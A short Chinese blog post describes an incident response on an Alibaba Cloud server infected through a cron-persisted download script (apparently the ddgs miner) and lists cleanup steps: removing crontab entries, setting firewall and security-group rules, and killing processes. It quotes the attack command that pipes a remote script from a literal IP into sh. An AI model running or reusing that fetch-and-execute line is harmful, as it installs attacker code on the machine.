记一次阿里云黑客攻击事件
这几天服务器一直发生异常行为,阿里云报警如下:
根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件
访问这个地址:http://165.225.157.157:8000/i.sh
看到执行语句如下:
大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定时任务crontab,还生成了ddgs.3010文件不断后台执行。
So,第一步,查看crontab -l ,果然有
那么显而易见,执行:crontab -r 删除掉cron任务。
第二步,安装firewall,具体操作,参考我的另外一篇博客:https://blog.csdn.net/u012259256/article/details/61018892
限制固定的访问端口:
第三步,其实阿里云后台提供了安全组策略,可以完成防火墙的功能,而且更加方便配置,配置如下(并且把165.225.157.157加入黑名单,不允许访问):
第四步,kill掉这些恶毒的进程,MD
用top命令,实时查看进程占用情况
(PS:因为进程已经被我kill掉,所以看不到数据啦)
没有kill之前,有一个恶意进程CPU占用198%,还有ddgs.3010进程,一直后台运行。总之,找到PID,然后kill就可以!
---------------------------------------------
总结:买了服务器一定记得先安装防火墙,或者设置安全策略!
Yeager